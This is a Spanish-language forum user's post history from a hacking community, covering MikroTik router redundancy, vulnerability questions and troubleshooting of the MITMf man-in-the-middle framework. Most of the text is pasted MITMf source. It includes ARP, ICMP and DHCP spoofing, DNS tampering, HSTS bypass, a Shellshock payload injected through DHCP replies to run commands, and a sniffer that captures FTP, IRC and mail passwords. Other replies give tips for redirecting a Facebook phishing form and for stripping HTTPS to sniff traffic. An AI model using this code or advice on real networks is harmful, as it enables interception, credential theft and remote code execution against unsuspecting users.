Mostrar Mensajes

Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.

Mostrar Mensajes Menú

Mensajes - davidhs

Páginas 1 2 3 4

#41

Dudas y pedidos generales / Re:Mikrotik redundancia de enlaces con VRRP

Marzo 23, 2017, 06:19:03 AM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Buenas.

Para realizar enlaces redundates en mikrotik, debes realizar un Load-Balancing (dependiendo las líneas que tengas) si son Adsl, F.O, Utp (Ip-estáticas o Dinámicas). Ya que enlaces redundantes, son aplicados únicamente si tu administras los dos extremos de la conexión.

Luego, cuando configuras el LB, debes elegir check-gateway=ping. De ésta manera, el mikrotik constantemente estará verificando los enlaces, cuando uno caiga, automaticamente tu red interna seguirá teniendo acceso a internet.

Recomiendo utilizar un equipo para balanceador detrás de él un administrador.

De todas formas, si arribaste a una solución, compartila.

Saludos !!

Hola xyz, investigando todos estos días he llegado a comprender que para realizar lo que yo necesito se debe implementar el protocolo BGP, es decir para los dos router board los cuales darán salida hacia internet, estos harán el balanceo y compartirán rutas mediante el protocolo iBGP, después de esto tendré que tener acceso a otro extremo del ISP (no es mi caso, pero ya se está tratando), el acceso al ISP sirve para poner en funcionamiento el salir hacia internet con una sola ip pública con dos ISP's diferentes, esto se hace con el protocolo eBGP, lo que hace es propagar todas las rutas hacia todos los nodos de internet indicando que si se quiere acceder a la dirección z.y.x.c se debe ir por x camino que es mi router. Esto se haría con ambos routers y con ambos ISP's, otro matiz a recalcar es que no nos tienen que asignar IP pública ningún ISP, si no que tenemos que por así decir comprar/alquilar esas direcciones IP para nosotros, es decir como si nosotros fuésemos los ISP's.
Y con este pequeño resumen termino mi investigación, ya se que tengo que implementar en la red y esta el proyecto en marcha con todas las dudas resueltas.

Muchas gracias.

#42

Dudas y pedidos generales / Re:Mikrotik redundancia de enlaces con VRRP

Marzo 17, 2017, 03:42:22 PM

You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login
Hola a todos amigos de underc0de, una vez más vengo al foro para ver si alguien me puede echar una mano con mi duda y a la vez problema, ya que tengo que implantar este sistema en el trabajo, he googleado bastante, pero no saco nada en claro, no me gusta que me lo den masticado, pero una ayuda de información relevante o pdfs nunca viene mal.
El caso es que tenemos una red montada ya y por aumentar la seguridad de la red(máxima disponibilidad) hemos decidido aumentar el número de routers, el siguiente diagrama de red explica claramente lo que quiero hacer, la idea es tener dos routers mikrotik cada uno con su propio ISP, y que si se cae algún router, el otro este disponible. He buscado información pero la que he encontrado no me ha quedado clara, si alguien me pudiese ayudar lo agradecería.
Adjunto el diagrama de red:

Ante todo agradecer la colaboración a la comunidad. Gracias.

Hola, yo en el trabajo implementé un router dual wan de Cisco (Cisco RV042 Dual WAN VPN Router) con balanceador de carga, tengo 2 proveedores ISP, cuando uno cae, el router automáticamente coje del otro wan para repartir la señal. Además mi router cisco está conectado a una switch que alimenta internet a todas las terminales de mi red.

Quizá esto es lo que busques, te dejo los detalles del router que tengo: You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

Saludos,

Te mando MP, Gracias por información.

#43

Dudas y pedidos generales / [SOLUCIONADO] Mikrotik redundancia de enlaces con VRRP

Marzo 16, 2017, 07:51:41 PM

Hola a todos amigos de underc0de, una vez más vengo al foro para ver si alguien me puede echar una mano con mi duda y a la vez problema, ya que tengo que implantar este sistema en el trabajo, he googleado bastante, pero no saco nada en claro, no me gusta que me lo den masticado, pero una ayuda de información relevante o pdfs nunca viene mal.
El caso es que tenemos una red montada ya y por aumentar la seguridad de la red(máxima disponibilidad) hemos decidido aumentar el número de routers, el siguiente diagrama de red explica claramente lo que quiero hacer, la idea es tener dos routers mikrotik cada uno con su propio ISP, y que si se cae algún router, el otro este disponible. He buscado información pero la que he encontrado no me ha quedado clara, si alguien me pudiese ayudar lo agradecería.
Adjunto el diagrama de red:

Ante todo agradecer la colaboración a la comunidad. Gracias.

#44

Dudas y pedidos generales / Re:Duda sobre vulnerabilidad

Julio 08, 2016, 07:12:39 PM

Muchísimas gracias, me ha servido de mucho la explicación grep

#45

Dudas y pedidos generales / [SOLUCIONADO] Duda sobre vulnerabilidad

Julio 08, 2016, 02:00:00 PM

Hola foro de Underc0de, hoy vengo con una duda, que es que alguien me explique como funciona un poco la vulnerabilidad http-method-tamper, a parte de explicarmela como sería la explotación y solución.

Muchas gracias de ante mano.

#46

Dudas y pedidos generales / Re:Duda sobre las redirecciones con Phishing de Facebook

Julio 08, 2016, 01:58:12 PM

Hola elreymusedes, con que pongas en el action de tu formulario la url donde quieres que se redireccione sobra, si quieres poner la de error, es decisión tuya

#47

Dudas y pedidos generales / Re:No puedo usar MITMf

Mayo 24, 2016, 01:04:59 PM

Hola MetalRules98, si no te captura ningún tipo de información comprueba que la herramienta ejecuta correctamente por así decir las "subherramientas" a las que llama MITMf, en este caso la herramienta encargada de la recogida de información de MITMf es net-creds, intenta ejecutar esta herramienta en solitario y hacer las pruebas pertinentes, en un principio no debería darte ningún problema esta herramienta, ya que esta incluida en los repositorios oficiales de Kali Linux y esta completamente operativa actualmente.

ATT: Davidhs

#48

Dudas y pedidos generales / Re:¿Como acceder a dos redes difirentes?

Marzo 07, 2016, 12:03:53 PM

Hola CRC, lo recomendable al hacer 2 redes distintas, es tener en cuenta que el primer router, tiene que ser un "Router ADSL" que es el que proporciona internet, del primer router tiene que salir un cable que estará conectado al switch de este, que llegara al router 2, que este no será "Router ADSL" si no uno normal, ese cable que lanzas desde router 1 hasta router dos, tiene que estar conectado en el puerto WAN/Internet del router 2 si sigues estos pasos no tienes que tener ningún problema a la hora de hacer ping de un extremo a otro.

ATT: David De Maya, Saludos. Si me equivoco en algo corregidme, estaré encantado de aprender nuevas cosas.

#49

Dudas y pedidos generales / Re:Full Path Disclosure - Ayuda

Marzo 03, 2016, 07:18:03 PM

No soy quien crees xD segurisimo, pero si me ha servido, muchísimas gracias magoAstral

#50

Dudas y pedidos generales / [SOLUCIONADO] Full Path Disclosure - Ayuda

Marzo 03, 2016, 05:59:56 PM

Hola, que tal comunidad de Underc0de, tengo una pequeña duda con esta vulnerabilidad Full Path Disclosure (FPD), se en que consiste y el por que de la causa, tanto como la solución, pero me gustaría saber como llegar a explotar a mi favor este tipo de vulnerabilidades, aquí adjunto una imagen del ejemplo:

PD: Muchas gracias a todos de ante mano. Saludos David.

#51

Dudas y pedidos generales / Re:Kali Linux no detecta red inalambrica ni por cable

Enero 10, 2016, 08:55:37 PM

Hola cuervo, podría intentar ayudarte, pero necesito que me des más información, como podría ser que virtualizador utilizas, la versión de kali linux que actualmente estas usando, si estas usando kali linux nativamente en un pc, etc. Agradecería que cuanta más información nos dieses, antes podríamos dar con la solución.

#52

Dudas y pedidos generales / Re:Problemas forzando https a http

Noviembre 04, 2015, 04:48:32 PM

Hola MonitoRuso, si, esta vulnerabilidad está ya corregida en la mayoría de navegadores web, pero este tipo de ataques son mas efectivos con hosts que están conectados mediante una red inalámbrica, puede ser que sea eso que no consigues snifar nada, si el comando esta correctamente escrito, de todas maneras este ataque, con esta herramienta no es eficaz creo recordar con Google Chrome, pero si con Mozilla Firefox, Opera y lógicamente Internet Explorer.

PD: Coméntanos un poco más tu laboratorio de pruebas, máquina atacante, víctima y el navegador que utiliza víctima. De todas maneras pásate por mi blog, creo que subí algo relacionado con eso, You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login

#53

Dudas y pedidos generales / Re:Problemas forzando https a http

Noviembre 02, 2015, 11:27:20 AM

Hola MonitoRuso, tu problema es que actualmente existe una doble protección sobre el HTTPS, este protocolo se llama HSTS, se ha conseguido ya la manera de burlar por así decir este protocolo con la versión de sslstrip2, para este tipo de ataques te recomiedo, MITMf, más conocido como Man In The Middle Framework, el problema es que haces el bypass al HTTPS pero no al HSTS.

PD: Saludos by DavidHS.

#54

Dudas y pedidos generales / ¿Que puedo hacer con este directorio?

Octubre 22, 2015, 06:52:52 PM

Hola muy buenas a todos comunidad de underc0de, bueno esta vez vengo con una dudilla, buscando por una web, he encontrado un directorio sin autenticación, y me preguntaba si se podia hacer algo malicioso con este directorio, digo de antemano que tengo permiso para urgar en la página web, esto es para reportarlo a su dueño en caso de que se pudiese hacer algo malicioso con ese directorio.

P.D: En caso de que se pudiese hacer algo malicioso agradecería saber que ataque se realizaría y como se solucionaría, para poder documentarlo. Gracias de antemano comunidad.

#55

Dudas y pedidos generales / Re:Duda con código de python HELP!

Octubre 01, 2015, 05:38:33 AM

Hola @You are not allowed to view links. You are not allowed to view links. Register or Login or You are not allowed to view links. Register or Login, lo que busco es algo parecido a esto, Gracias por responder:

Código: python


 menuNmap = raw_input("Inserta un valor ->")
                
                if menuNmap=="1":
                
                        ip = input("Ingresa el rango de IP's, x.x.x.x/24 --->")
                        
                        import shlex, subprocess
                        command_line = ('sudo nmap -sP %s',%( ip))
                        args = shlex.split(command_line)
                        subprocess.call(args)
                        
                        raw_input("Has pulsado instalar nmap...\npulsa una tecla para continuar")

puede ser que no me explicase correctamente, pero gracias de todas maneras Whiz todos tus comentarios me han sido de gran ayuda,

#56

Dudas y pedidos generales / [Python] Ejecutar comando y pasarle parámetros desde Python

Septiembre 30, 2015, 08:27:31 PM

Hola a todos, de ante mano gracias a todos ya sea por leer la duda o responderla. Bueno quería exponer mi rompedura de cabeza, lo que quiero hacer es, recoger un dato el cual estará en una variable, esta variable ira junto a un comando, donde este comando al ejecutarse se ejecutará con el dato recogido, he conseguido hacer algo como esto pero no me funciona, si alguien me iluminase le estaría muy agradecido:

Código: python


                
                print "\t1 - Crear archivo .txt"
        		
                menuNmap = raw_input("Inserta un numero ->")
                
                if menuFichero=="1":
                
                        fi = input("Ingresa el nombre para el fichero --->")
                        
                        import shlex, subprocess
                        command_line = ('sudo nano %s',%( fi))
                        args = shlex.split(command_line)
                        subprocess.call(args)

P.D: He acabado haciendo algo así, esto no me funciona, si alguien me ayudase se lo agradecería GRACIAS!

#57

Dudas y pedidos generales / Re:Error al hacer un ataque MITM con el framework MITMf

Septiembre 24, 2015, 02:59:11 PM

Muchísimas Gracias WhiZ.

#58

Dudas y pedidos generales / Re:Error al hacer un ataque MITM con el framework MITMf

Septiembre 23, 2015, 06:00:57 PM

Hola WhiZ, no me ha quedado muy claro lo que me has querido decir, ya que no tengo muchos conocimientos ni de programación y ni de phyton, pero me ayudaría mucho si le echases un vistazo a los archivos, aquí te los adjunto:

"Spoof.py":

Código: python


#
# DNS tampering code stolen from https://github.com/DanMcInerney/dnsspoof
#
# CredHarvesting code stolen from https://github.com/DanMcInerney/creds.py
#

from twisted.internet import reactor
from twisted.internet.interfaces import IReadDescriptor
from plugins.plugin import Plugin
from time import sleep
import dns.resolver
import nfqueue
import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  #Gets rid of IPV6 Error when importing scapy
from scapy.all import *
import os
import sys
import threading
from base64 import b64decode
from urllib import unquote
import binascii
import random


class Spoof(Plugin):
    name = "Spoof"
    optname = "spoof"
    desc = 'Redirect/Modify traffic using ICMP, ARP or DHCP'
    has_opts = True

    def initialize(self, options):
        '''Called if plugin is enabled, passed the options namespace'''
        self.options = options
        self.interface = options.interface
        self.arp = options.arp
        self.icmp = options.icmp
        self.dns = options.dns
        self.dhcp = options.dhcp
        self.shellshock = options.shellshock
        self.gateway = options.gateway
        #self.summary = options.summary
        self.target = options.target
        self.arpmode = options.arpmode
        self.port = options.listen
        self.hsts = options.hsts
        self.manualiptables = options.manualiptables  #added by [email protected]
        self.debug = False
        self.send = True

        if os.geteuid() != 0:
            sys.exit("[-] Spoof plugin requires root privileges")
 
        if self.options.log_level == 'debug':
            self.debug = True

        try:
            self.mac = get_if_hwaddr(self.interface)
        except Exception, e:
            sys.exit('[-] Error retrieving interfaces MAC address: %s' % e)
       
        if self.arp:
            if not self.gateway:
                sys.exit("[-] --arp argument requires --gateway")

            self.routermac = getmacbyip(self.gateway)
           
            print "[*] ARP Spoofing enabled"
            if self.arpmode == 'req':
                pkt = self.build_arp_req()
            elif self.arpmode == 'rep':
                pkt = self.build_arp_rep()
           
            thread_target = self.send_packets
            thread_args = (pkt, self.interface, self.debug,)

        elif self.icmp:
            if not self.gateway:
                sys.exit("[-] --icmp argument requires --gateway")

            self.routermac = getmacbyip(self.gateway)

            print "[*] ICMP Redirection enabled"
            pkt = self.build_icmp()
           
            thread_target = self.send_packets
            thread_args = (pkt, self.interface, self.debug,)

        elif self.dhcp:
            print "[*] DHCP Spoofing enabled"
            if self.target:
                sys.exit("[-] --target argument invalid when DCHP spoofing")

            self.rand_number = []
            self.dhcp_dic = {}
            self.dhcpcfg = options.configfile['Spoof']['DHCP']
           
            thread_target = self.dhcp_sniff
            thread_args = ()
       
        else:
            sys.exit("[-] Spoof plugin requires --arp, --icmp or --dhcp")

        print "[*] Spoof plugin online"
        if not self.manualiptables:
            os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')

        if (self.dns or self.hsts):
            print "[*] DNS Tampering enabled"
           
            if self.dns:
                self.dnscfg = options.configfile['Spoof']['DNS']

            self.hstscfg = options.configfile['SSLstrip+']

            if not self.manualiptables:
                os.system('iptables -t nat -A PREROUTING -p udp --dport 53 -j NFQUEUE')

            self.start_dns_queue()

        file = open('/proc/sys/net/ipv4/ip_forward', 'w')
        file.write('1')
        file.close()
        if not self.manualiptables:
            print '[*] Setting up iptables'
            os.system('iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port %s' % self.port)

        #CHarvester = CredHarvester()
        t = threading.Thread(name='spoof_thread', target=thread_target, args=thread_args)
        #t2 = threading.Thread(name='cred_harvester', target=CHarvester.start, args=(self.interface))

        t.setDaemon(True)
        t.start()

    def dhcp_rand_ip(self):
        pool = self.dhcpcfg['ip_pool'].split('-')
        trunc_ip = pool[0].split('.'); del(trunc_ip[3])
        max_range = int(pool[1])
        min_range = int(pool[0].split('.')[3])
        number_range = range(min_range, max_range)
        for n in number_range:
            if n in self.rand_number:
                number_range.remove(n)
        rand_number = random.choice(number_range)
        self.rand_number.append(rand_number)
        rand_ip = '.'.join(trunc_ip) + '.' + str(rand_number)

        return rand_ip

    def dhcp_callback(self, resp):
        if resp.haslayer(DHCP):
            xid = resp[BOOTP].xid
            mac_addr = resp[Ether].src
            raw_mac = binascii.unhexlify(mac_addr.replace(":", ""))
            if xid in self.dhcp_dic.keys():
                client_ip = self.dhcp_dic[xid]
            else:
                client_ip = self.dhcp_rand_ip()
                self.dhcp_dic[xid] = client_ip

            if resp[DHCP].options[0][1] == 1:
                logging.info("Got DHCP DISCOVER from: " + mac_addr + " xid: " + hex(xid))
                logging.info("Sending DHCP OFFER")
                packet = (Ether(src=get_if_hwaddr(self.interface), dst='ff:ff:ff:ff:ff:ff') /
                IP(src=get_if_addr(self.interface), dst='255.255.255.255') /
                UDP(sport=67, dport=68) /
                BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=get_if_addr(self.interface), xid=xid) /
                DHCP(options=[("message-type", "offer"),
                    ('server_id', get_if_addr(self.interface)),
                    ('subnet_mask', self.dhcpcfg['subnet']),
                    ('router', get_if_addr(self.interface)),
                    ('lease_time', 172800),
                    ('renewal_time', 86400),
                    ('rebinding_time', 138240),
                    "end"]))

                try:
                    packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
                except KeyError:
                    pass

                sendp(packet, iface=self.interface, verbose=self.debug)

            if resp[DHCP].options[0][1] == 3:
                logging.info("Got DHCP REQUEST from: " + mac_addr + " xid: " + hex(xid))
                packet = (Ether(src=get_if_hwaddr(self.interface), dst='ff:ff:ff:ff:ff:ff') /
                IP(src=get_if_addr(self.interface), dst='255.255.255.255') /
                UDP(sport=67, dport=68) /
                BOOTP(op='BOOTREPLY', chaddr=raw_mac, yiaddr=client_ip, siaddr=get_if_addr(self.interface), xid=xid) /
                DHCP(options=[("message-type", "ack"),
                    ('server_id', get_if_addr(self.interface)),
                    ('subnet_mask', self.dhcpcfg['subnet']),
                    ('router', get_if_addr(self.interface)),
                    ('lease_time', 172800),
                    ('renewal_time', 86400),
                    ('rebinding_time', 138240)]))

                try:
                    packet[DHCP].options.append(tuple(('name_server', self.dhcpcfg['dns_server'])))
                except KeyError:
                    pass

                if self.shellshock:
                    logging.info("Sending DHCP ACK with shellshock payload")
                    packet[DHCP].options.append(tuple((114, "() { ignored;}; " + self.shellshock)))
                    packet[DHCP].options.append("end")
                else:
                    logging.info("Sending DHCP ACK")
                    packet[DHCP].options.append("end")

                sendp(packet, iface=self.interface, verbose=self.debug)

    def dhcp_sniff(self):
        sniff(filter="udp and (port 67 or 68)", prn=self.dhcp_callback, iface=self.interface)

    def send_packets(self, pkt, interface, debug):
        while self.send:
            sendp(pkt, inter=2, iface=interface, verbose=debug)

    def build_icmp(self):
        pkt = IP(src=self.gateway, dst=self.target)/ICMP(type=5, code=1, gw=get_if_addr(self.interface)) /\
              IP(src=self.target, dst=self.gateway)/UDP()

        return pkt

    def build_arp_req(self):
        if self.target is None:
            pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, pdst=self.gateway)
        elif self.target:
            target_mac = getmacbyip(self.target)
            if target_mac is None:
                sys.exit("[-] Error: Could not resolve targets MAC address")

            pkt = Ether(src=self.mac, dst=target_mac)/ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=target_mac, pdst=self.target)

        return pkt

    def build_arp_rep(self):
        if self.target is None:
            pkt = Ether(src=self.mac, dst='ff:ff:ff:ff:ff:ff')/ARP(hwsrc=self.mac, psrc=self.gateway, op=2)
        elif self.target:
            target_mac = getmacbyip(self.target)
            if target_mac is None:
                sys.exit("[-] Error: Could not resolve targets MAC address")

            pkt = Ether(src=self.mac, dst=target_mac)/ARP(hwsrc=self.mac, psrc=self.gateway, hwdst=target_mac, pdst=self.target, op=2)

        return pkt

    def resolve_domain(self, domain):
        try:
            #logging.info("Resolving -> %s" % domain)
            answer = dns.resolver.query(domain, 'A')
            real_ips = []
            for rdata in answer:
                real_ips.append(rdata.address)

            if len(real_ips) > 0:
                return real_ips

        except Exception:
            logging.debug("Error resolving " + domain)

    def nfqueue_callback(self, payload, *kargs):
        data = payload.get_data()
        pkt = IP(data)
        if not pkt.haslayer(DNSQR):
            payload.set_verdict(nfqueue.NF_ACCEPT)
        else:
            #logging.info("Got DNS packet for %s %s" % (pkt[DNSQR].qname, pkt[DNSQR].qtype))
            if self.dns:
                for k, v in self.dnscfg.items():
                    if k in pkt[DNSQR].qname:
                        self.modify_dns(payload, pkt, v)

            elif self.hsts:
                if (pkt[DNSQR].qtype is 28 or pkt[DNSQR].qtype is 1):
                    for k,v in self.hstscfg.items():
                        if v == pkt[DNSQR].qname[:-1]:
                            ip = self.resolve_domain(k)
                            if ip:
                                self.modify_dns(payload, pkt, ip)

                    if 'wwww' in pkt[DNSQR].qname:
                        ip = self.resolve_domain(pkt[DNSQR].qname[1:-1])
                        if ip:
                            self.modify_dns(payload, pkt, ip)

                    if 'web' in pkt[DNSQR].qname:
                        ip = self.resolve_domain(pkt[DNSQR].qname[3:-1])
                        if ip:
                            self.modify_dns(payload, pkt, ip)

    def modify_dns(self, payload, pkt, ip):
        spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) /\
        UDP(dport=pkt[UDP].sport, sport=pkt[UDP].dport) /\
        DNS(id=pkt[DNS].id, qr=1, aa=1, qd=pkt[DNS].qd)

        if self.hsts:
            spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip[0]); del ip[0] #have to do this first to initialize the an field
            for i in ip:
                spoofed_pkt[DNS].an.add_payload(DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=i))

            payload.set_verdict_modified(nfqueue.NF_ACCEPT, str(spoofed_pkt), len(spoofed_pkt))
            logging.info("%s Resolving %s for HSTS bypass" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))

        if self.dns:
            spoofed_pkt[DNS].an = DNSRR(rrname=pkt[DNS].qd.qname, ttl=1800, rdata=ip)
            logging.info("%s Modified DNS packet for %s" % (pkt[IP].src, pkt[DNSQR].qname[:-1]))

    def start_dns_queue(self):
        self.q = nfqueue.queue()
        self.q.set_callback(self.nfqueue_callback)
        self.q.fast_open(0, socket.AF_INET)
        self.q.set_queue_maxlen(5000)
        reactor.addReader(self)
        self.q.set_mode(nfqueue.NFQNL_COPY_PACKET)

    def fileno(self):
        return self.q.get_fd()

    def doRead(self):
        self.q.process_pending(100)

    def connectionLost(self, reason):
        reactor.removeReader(self)

    def logPrefix(self):
        return 'queue'

    def add_options(self, options):
        group = options.add_mutually_exclusive_group(required=False)
        group.add_argument('--arp', dest='arp', action='store_true', default=False, help='Redirect traffic using ARP spoofing')
        group.add_argument('--icmp', dest='icmp', action='store_true', default=False, help='Redirect traffic using ICMP redirects')
        group.add_argument('--dhcp', dest='dhcp', action='store_true', default=False, help='Redirect traffic using DHCP offers')
        options.add_argument('--dns', dest='dns', action='store_true', default=False, help='Modify intercepted DNS queries')
        options.add_argument('--shellshock', type=str, metavar='PAYLOAD', dest='shellshock', default=None, help='Trigger the Shellshock vuln when spoofing DHCP, and execute specified command')
        options.add_argument('--gateway', dest='gateway', help='Specify the gateway IP')
        options.add_argument('--target', dest='target', help='Specify a host to poison [default: subnet]')
        options.add_argument('--arpmode', dest='arpmode', default='req', help=' ARP Spoofing mode: requests (req) or replies (rep) [default: req]')
        options.add_argument('--manual-iptables', dest='manualiptables', action='store_true', default=False, help='Do not setup iptables or flush them automatically')
        #options.add_argument('--summary', action='store_true', dest='summary', default=False, help='Show packet summary and ask for confirmation before poisoning')

    def finish(self):
        self.send = False
        sleep(3)
        file = open('/proc/sys/net/ipv4/ip_forward', 'w')
        file.write('0')
        file.close()
        if not self.manualiptables:
            print '\n[*] Flushing iptables'
            os.system('iptables -F && iptables -X && iptables -t nat -F && iptables -t nat -X')

        if (self.dns or self.hsts):
            try:
                self.q.unbind(socket.AF_INET)
                self.q.close()
            except:
                pass

        if self.arp:
            print '[*] Re-arping network'
            pkt = Ether(src=self.routermac, dst='ff:ff:ff:ff:ff:ff')/ARP(psrc=self.gateway, hwsrc=self.routermac, op=2)
            sendp(pkt, inter=1, count=5, iface=self.interface)

class CredHarvester():

    fragged = 0
    imapauth = 0
    popauth = 0
    ftpuser = None # Necessary since user and pass come in separate packets
    ircnick = None # Necessary since user and pass come in separate packets
    # For concatenating fragmented packets
    prev_pkt = {6667:{}, # IRC
                143:{},  # IMAP
                110:{},  # POP3
                26:{},   # SMTP
                25:{},   # SMTP
                21:{}}   # FTP

    def start(self, interface):
        sniff(prn=self.pkt_sorter, iface=interface)

    def pkt_sorter(self, pkt):
        if pkt.haslayer(Raw) and pkt.haslayer(TCP):
            self.dest    = pkt[IP].dst
            self.src     = pkt[IP].src
            self.dport   = pkt[TCP].dport
            self.sport   = pkt[TCP].sport
            self.ack     = pkt[TCP].ack
            self.seq     = pkt[TCP].seq
            self.load    = str(pkt[Raw].load)

            if self.dport == 6667:
                """ IRC """
                port = 6667
                self.header_lines = self.hb_parse(port) # Join fragmented pkts
                return self.irc(port)

            elif self.dport == 21 or self.sport == 21:
                """ FTP """
                port = 21
                self.prev_pkt[port] = self.frag_joiner(port) # No headers in FTP so no need for hb_parse
                self.ftp(port)

            elif self.sport == 110 or self.dport == 110:
                """ POP3 """
                port = 110
                self.header_lines = self.hb_parse(port) # Join fragmented pkts
                self.mail_pw(port)

            elif self.sport == 143 or self.dport == 143:
                """ IMAP """
                port = 143
                self.header_lines = self.hb_parse(port) # Join fragmented pkts
                self.mail_pw(port)

    def headers_body(self, protocol):
        try:
            h, b = protocol.split("\r\n\r\n", 1)
            return h, b
        except Exception:
            h, b = protocol, ''
            return h, b

    def frag_joiner(self, port):
        self.fragged = 0
        if len(self.prev_pkt[port]) > 0:
            if self.ack in self.prev_pkt[port]:
                self.fragged = 1
                return {self.ack:self.prev_pkt[port][self.ack]+self.load}
        return {self.ack:self.load}

    def hb_parse(self, port):
        self.prev_pkt[port] = self.frag_joiner(port)
        self.headers, self.body = self.headers_body(self.prev_pkt[port][self.ack])
        return self.headers.split('\r\n')

    def mail_pw(self, port):
        load = self.load.strip('\r\n')

        if self.dport == 143:
            auth_find = 'authenticate plain'
            proto = 'IMAP'
            auth = self.imapauth
            self.imapauth = self.mail_pw_auth(load, auth_find, proto, auth, port)

        elif self.dport == 110:
            auth_find = 'AUTH PLAIN'
            proto = 'POP'
            auth = self.popauth
            self.popauth = self.mail_pw_auth(load, auth_find, proto, auth, port)

    def mail_pw_auth(self, load, auth_find, proto, auth, port):
        if auth == 1:
            user, pw = load, 0
            logging.warning('[%s] %s auth: %s' % (self.src, proto, load))
            self.b64decode(load, port)
            return 0

        elif auth_find in load:
            return 1

    def b64decode(self, load, port):
        b64str = load
        try:
            decoded = b64decode(b64str).replace('\x00', ' ')[1:] # delete space at beginning
        except Exception:
            decoded = ''
        # Test to see if decode worked
        if '@' in decoded:
            logging.debug('%s Decoded: %s' % (self.src, decoded))
            decoded = decoded.split()

    def ftp(self, port):
        """Catch FTP usernames, passwords, and servers"""
        load = self.load.replace('\r\n', '')

        if port == self.dport:
            if 'USER ' in load:
                    user = load.strip('USER ')
                    logging.warning('[%s > %s] FTP user:    ' % (self.src, self.dest), user)
                    self.ftpuser = user

            elif 'PASS ' in load:
                    pw = load.strip('PASS ')
                    logging.warning('[%s > %s] FTP password:' % (self.src, self.dest), pw)

    def irc(self, port):
        load = self.load.split('\r\n')[0]

        if 'NICK ' in load:
            self.ircnick = load.strip('NICK ')
            logging.warning('[%s > %s] IRC nick: %s' % (self.src, self.dest, self.ircnick))

        elif 'NS IDENTIFY ' in load:
            ircpass = load.strip('NS IDENTIFY ')
            logging.warning('[%s > %s] IRC password: %s' % (self.src, self.dest, ircpass))

"mitmf.py":

Código: python


#!/usr/bin/env python2.7

# Copyright (c) 2014-2016 Moxie Marlinspike, Marcello Salvati
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the GNU
# General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307
# USA
#

import logging
logging.getLogger("scapy.runtime").setLevel(logging.ERROR) #Gets rid of IPV6 Error when importing scapy
logging.getLogger("requests").setLevel(logging.WARNING) #Disables "Starting new HTTP Connection (1)" log message

import argparse
import sys
import os
import threading
import core.responder.settings as settings

from argparse import RawTextHelpFormatter
from twisted.web import http
from twisted.internet import reactor
from core.logger import logger
from core.banners import get_banner
from plugins import *

print get_banner()

mitmf_version = '0.9.8'
mitmf_codename = 'The Dark Side'

if os.geteuid() != 0:
    sys.exit("[-] The derp is strong with this one")

parser = argparse.ArgumentParser(description="MITMf v{} - '{}'".format(mitmf_version, mitmf_codename),
                                 version="{} - '{}'".format(mitmf_version, mitmf_codename),
                                 usage='mitmf.py -i interface [mitmf options] [plugin name] [plugin options]',
                                 epilog="Use wisely, young Padawan.",
                                 formatter_class=RawTextHelpFormatter)

#add MITMf options
sgroup = parser.add_argument_group("MITMf", "Options for MITMf")
sgroup.add_argument("--log-level", type=str,choices=['debug', 'info'], default="info", help="Specify a log level [default: info]")
sgroup.add_argument("-i", dest='interface', required=True, type=str, help="Interface to listen on")
sgroup.add_argument("-c", dest='configfile', metavar="CONFIG_FILE", type=str, default="./config/mitmf.conf", help="Specify config file to use")
sgroup.add_argument("-p", "--preserve-cache", action="store_true", help="Don't kill client/server caching")
sgroup.add_argument("-r", '--read-pcap', type=str, help='Parse specified pcap for credentials and exit')
sgroup.add_argument("-l", dest='listen_port', type=int, metavar="PORT", default=10000, help="Port to listen on (default 10000)")
sgroup.add_argument("-f", "--favicon", action="store_true", help="Substitute a lock favicon on secure requests.")
sgroup.add_argument("-k", "--killsessions", action="store_true", help="Kill sessions in progress.")
sgroup.add_argument("-F", "--filter", type=str, help='Filter to apply to incoming traffic')

#Initialize plugins and pass them the parser NameSpace object
plugins = [plugin(parser) for plugin in plugin.Plugin.__subclasses__()]

if len(sys.argv) == 1:
    parser.print_help()
    sys.exit(1)

options = parser.parse_args()

#Set the log level
logger().log_level = logging.__dict__[options.log_level.upper()]

from core.logger import logger
formatter = logging.Formatter("%(asctime)s %(message)s", datefmt="%Y-%m-%d %H:%M:%S")
log = logger().setup_logger("MITMf", formatter)

from core.netcreds import NetCreds

if options.read_pcap:
    NetCreds().parse_pcap(options.read_pcap)

#Check to see if we supplied a valid interface, pass the IP and MAC to the NameSpace object
from core.utils import get_ip, get_mac, shutdown
options.ip  = get_ip(options.interface)
options.mac = get_mac(options.interface)

settings.Config.populate(options)

log.debug("MITMf started: {}".format(sys.argv))

#Start Net-Creds
print "[*] MITMf v{} - '{}'".format(mitmf_version, mitmf_codename)

NetCreds().start(options.interface, options.ip)
print "|"
print "|_ Net-Creds v{} online".format(NetCreds.version)

from core.proxyplugins import ProxyPlugins

ProxyPlugins().all_plugins = plugins
for plugin in plugins:

    #load only the plugins that have been called at the command line
    if vars(options)[plugin.optname] is True:

        ProxyPlugins().add_plugin(plugin)

        print "|_ {} v{}".format(plugin.name, plugin.version)
        if plugin.tree_info:
